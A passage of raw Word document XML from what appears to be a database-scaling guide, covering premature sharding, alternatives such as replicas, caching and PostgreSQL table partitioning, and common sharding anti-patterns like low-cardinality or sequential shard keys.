        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Premature Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F1942" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Sharding a database that's at 10% capacity "for future scale."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958C1E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's bad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12E1D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Adds enormous complexity immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E5D0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-shard queries are harder from day one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4B028" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Distributed transactions are harder from day one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216F913" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Debugging is harder (which shard has the bug?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E2232" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1574"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Developer velocity decreases significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452BF43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The right time to shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25806B25" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B4362" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scale alternatives exhausted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174D161" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. ✓ Optimize queries (indexing, query rewrite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39915AB8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. ✓ Vertical scaling (bigger machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18520E93" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. ✓ Read replicas (scale reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05ED0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4. ✓ Caching (reduce DB load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163E8C9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  5. ✓ Archiving (reduce active data size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6316D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  6. ✓ Connection pooling (reduce connection overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A02E43D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAB022" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If all above are done and you STILL can't scale → shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43D620" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Alternatives to Sharding</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504"/>
        <w:gridCol w:w="5846"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7E9B7DE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7A784C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Alternative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65B9F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>When It Suffices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="54A9D5E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3A3D4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Vertical scaling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4E4496" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Data &lt; 10 TB, writes &lt; 50K TPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0271F4C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7FED97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Read replicas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CA7832" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Read-heavy (90%+ reads), writes manageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="15CED79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C91FC2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Caching (Redis)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D433AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hot data fits in memory, reads dominate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="322D807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31F66D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Partitioning (single DB)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C79861" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Large tables, time-based archival, single node still has capacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="20E1AB0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A6ADDA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>NewSQL (CockroachDB, Spanner)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683C65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Need sharding benefits but want SQL and auto-management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="73E4F65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6A4E09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Separate databases per service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406EBB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Microservices each own their data (natural partition by domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31CC4659" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Table Partitioning vs. Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B381DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Table partitioning (within one database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589408A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DDEC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- PostgreSQL declarative partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D745E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA10302" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  id BIGINT, customer_id BIGINT, created_at DATE, total DECIMAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD52FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>) PARTITION BY RANGE (created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565D070" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7DFA1D52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders_2024_01 PARTITION OF orders FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F43BB4F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE orders_2024_02 PARTITION OF orders FOR VALUES FROM ('2024-02-01') TO ('2024-03-01');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475D4E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key difference: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73"/>
        <w:gridCol w:w="3187"/>
        <w:gridCol w:w="3690"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="106F635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74E6CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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C7143F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Partitioning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60A38E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sharding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1BAA2EB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43CC64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Machines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04D77D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Single database instance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CBDB56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Multiple database instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="19D1F61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CEC5FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Shared resources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8EA53A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Same CPU, RAM, disk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65509B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Independent CPU, RAM, disk per shard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7CC9B7C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D9C704" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Write scaling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B499F5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>No (single writer)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82F3A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Yes (each shard writes independently)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0C03EC8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9C98B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Cross-partition queries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9BD10A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Fast (same machine)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AF52B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Slow (network between shards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0ABBA8C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96A30F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Transactions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FA3503" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Normal ACID (single DB)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D0A7A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Distributed transactions needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4871C74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46933D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Operations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8B66CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Simple (one DB to manage)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F37F91" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Complex (N databases to manage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0BBE392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F5B98A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Use case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DBD46D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Manage large tables, fast pruning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7125A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Scale beyond single machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA383EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partitioning is NOT sharding.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Partitioning is an internal optimization within a single database. Sharding distributes data across separate machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09177A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="123D4C03">
          <v:rect id="_x0000_i5771" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6913D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Sharding Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008EBCFC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Choosing Low-Cardinality Shard Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4D1A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111B15A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BAD: shard by status (3 values: active, inactive, suspended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5719CEE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Only 3 possible shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14225E37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → 90% of data is "active" → one shard has 90% of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05851A9B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Cannot scale beyond 3 shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A6FBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Choosing Sequential Shard Keys with Range Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DB825" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E4167" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>BAD: range-shard by auto_increment id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFDDB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → All new writes go to the highest range (last shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E199264" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → One shard handles all write traffic (hot shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611E928" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Other shards are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A93C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Cross-Shard Joins in Hot Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473F0AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE48C83" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BAD: User table sharded by user_id, Product table sharded by product_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF66DD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Every order query needs user data + product data → 2 shards minimum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A0E12" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Hot path requires cross-shard join → slow, complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A7D97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3480D469" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BETTER: Co-locate orders with users (shard by user_id for both).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D618FB8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">         Denormalize product info into orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D35BF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Not Planning for Resharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AD4B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F31BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>BAD: hash(key) % 16 hardcoded everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636427F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
